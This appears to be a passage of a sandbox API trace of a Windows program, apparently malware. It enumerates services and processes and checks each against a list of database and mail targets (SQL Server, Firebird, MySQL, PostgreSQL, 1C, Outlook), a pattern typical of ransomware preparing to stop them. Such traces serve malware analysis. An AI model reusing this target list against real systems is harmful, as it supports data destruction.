	[0164.058] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x11e4) returned 0x7ba6360
	[0164.058] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7ba6360, cbBufSize=0x11e4, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7ba6360, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0164.059] CloseServiceHandle (hSCObject=0xb616c60) returned 1
	[0164.059] lstrlenW (lpString="Appinfo") returned 7
	[0164.059] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0164.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0164.059] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0164.059] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0164.059] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0164.059] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0164.059] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0164.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0164.059] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0164.059] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0164.059] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0164.059] lstrlenW (lpString="AudioSrv") returned 8
	[0164.059] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0164.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0164.059] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0164.059] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0164.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0164.060] lstrlenW (lpString="BFE") returned 3
	[0164.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0164.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0164.060] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0164.060] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0164.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0164.060] lstrlenW (lpString="CryptSvc") returned 8
	[0164.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0164.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0164.060] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0164.060] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0164.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0164.060] lstrlenW (lpString="CscService") returned 10
	[0164.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0164.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0164.060] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0164.060] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0164.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0164.060] lstrlenW (lpString="DcomLaunch") returned 10
	[0164.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0164.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0164.060] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0164.060] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0164.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0164.060] lstrlenW (lpString="Dhcp") returned 4
	[0164.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0164.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0164.060] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0164.060] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0164.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0164.060] lstrlenW (lpString="Dnscache") returned 8
	[0164.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0164.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0164.061] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0164.061] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0164.061] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0164.061] lstrlenW (lpString="DPS") returned 3
	[0164.061] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0164.061] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0164.061] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0164.061] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0164.061] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0164.061] lstrlenW (lpString="eventlog") returned 8
	[0164.061] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0164.061] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0164.061] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0164.061] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0164.061] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0164.061] lstrlenW (lpString="EventSystem") returned 11
	[0164.061] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0164.061] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0164.061] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0164.061] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0164.061] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0164.061] lstrlenW (lpString="gpsvc") returned 5
	[0164.061] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0164.061] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0164.061] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0164.061] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0164.061] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0164.061] lstrlenW (lpString="iphlpsvc") returned 8
	[0164.061] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0164.061] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0164.061] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0164.061] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0164.061] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0164.062] lstrlenW (lpString="LanmanServer") returned 12
	[0164.062] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0164.062] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0164.062] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0164.062] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0164.062] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0164.062] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0164.062] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0164.062] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0164.062] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0164.062] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0164.062] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0164.062] lstrlenW (lpString="lmhosts") returned 7
	[0164.062] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0164.062] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0164.062] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0164.062] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0164.062] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0164.062] lstrlenW (lpString="MMCSS") returned 5
	[0164.062] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0164.062] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0164.062] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0164.062] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0164.062] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0164.062] lstrlenW (lpString="MpsSvc") returned 6
	[0164.062] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0164.062] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0164.062] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0164.062] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0164.062] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0164.062] lstrlenW (lpString="Netman") returned 6
	[0164.062] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0164.062] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0164.062] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0164.062] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0164.063] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0164.063] lstrlenW (lpString="netprofm") returned 8
	[0164.063] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0164.063] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0164.063] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0164.063] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0164.063] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0164.063] lstrlenW (lpString="NlaSvc") returned 6
	[0164.063] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0164.063] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0164.063] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0164.063] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0164.063] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0164.063] lstrlenW (lpString="nsi") returned 3
	[0164.063] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0164.063] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0164.063] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0164.063] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0164.063] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0164.063] lstrlenW (lpString="PcaSvc") returned 6
	[0164.063] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0164.063] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0164.063] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0164.063] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0164.063] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0164.063] lstrlenW (lpString="PlugPlay") returned 8
	[0164.063] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0164.063] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0164.063] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0164.063] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0164.063] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0164.063] lstrlenW (lpString="Power") returned 5
	[0164.063] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0164.063] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0164.064] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0164.064] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0164.064] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0164.064] lstrlenW (lpString="ProfSvc") returned 7
	[0164.064] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0164.064] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0164.064] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0164.064] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0164.064] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0164.064] lstrlenW (lpString="RpcEptMapper") returned 12
	[0164.064] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0164.064] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0164.064] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0164.064] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0164.064] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0164.064] lstrlenW (lpString="RpcSs") returned 5
	[0164.064] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0164.064] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0164.064] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0164.064] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0164.064] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0164.064] lstrlenW (lpString="SamSs") returned 5
	[0164.064] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0164.064] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0164.064] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0164.064] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0164.064] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0164.064] lstrlenW (lpString="Schedule") returned 8
	[0164.064] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0164.064] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0164.064] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0164.064] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0164.064] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0164.064] lstrlenW (lpString="SENS") returned 4
	[0164.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0164.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0164.065] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0164.065] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0164.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0164.065] lstrlenW (lpString="ShellHWDetection") returned 16
	[0164.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0164.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0164.065] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0164.065] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0164.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0164.065] lstrlenW (lpString="Spooler") returned 7
	[0164.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0164.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0164.065] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0164.065] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0164.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0164.065] lstrlenW (lpString="SysMain") returned 7
	[0164.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0164.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0164.065] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0164.065] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0164.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0164.065] lstrlenW (lpString="Themes") returned 6
	[0164.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0164.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0164.065] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0164.065] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0164.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0164.065] lstrlenW (lpString="TrkWks") returned 6
	[0164.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0164.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0164.065] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0164.065] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0164.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0164.066] lstrlenW (lpString="UxSms") returned 5
	[0164.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0164.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0164.066] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0164.066] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0164.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0164.066] lstrlenW (lpString="WdiServiceHost") returned 14
	[0164.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0164.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0164.066] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0164.066] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0164.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0164.066] lstrlenW (lpString="WdiSystemHost") returned 13
	[0164.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0164.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0164.066] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0164.066] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0164.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0164.066] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0164.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0164.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0164.066] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0164.066] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0164.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0164.066] lstrlenW (lpString="Winmgmt") returned 7
	[0164.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0164.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0164.066] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0164.066] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0164.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0164.066] lstrlenW (lpString="WPDBusEnum") returned 10
	[0164.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0164.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0164.066] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0164.067] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0164.067] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0164.067] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7ba6360 | out: hHeap=0x7ab0000) returned 1
	[0164.067] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3d0
	[0164.068] Process32FirstW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0164.069] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0164.069] lstrlenW (lpString="System") returned 6
	[0164.069] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0164.069] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0164.069] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0164.069] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0164.069] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0164.069] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0164.069] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0164.069] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0164.070] lstrlenW (lpString="smss.exe") returned 8
	[0164.070] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0164.070] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0164.070] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0164.070] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0164.070] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0164.070] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0164.070] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0164.070] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0164.070] lstrlenW (lpString="csrss.exe") returned 9
	[0164.070] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0164.070] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0164.070] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0164.070] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0164.070] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0164.070] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0164.070] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0164.070] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0164.071] lstrlenW (lpString="wininit.exe") returned 11
	[0164.071] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0164.071] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0164.071] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0164.071] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0164.071] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0164.071] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0164.071] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0164.071] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0164.071] lstrlenW (lpString="csrss.exe") returned 9
	[0164.071] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0164.071] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0164.071] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0164.071] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0164.071] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0164.071] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
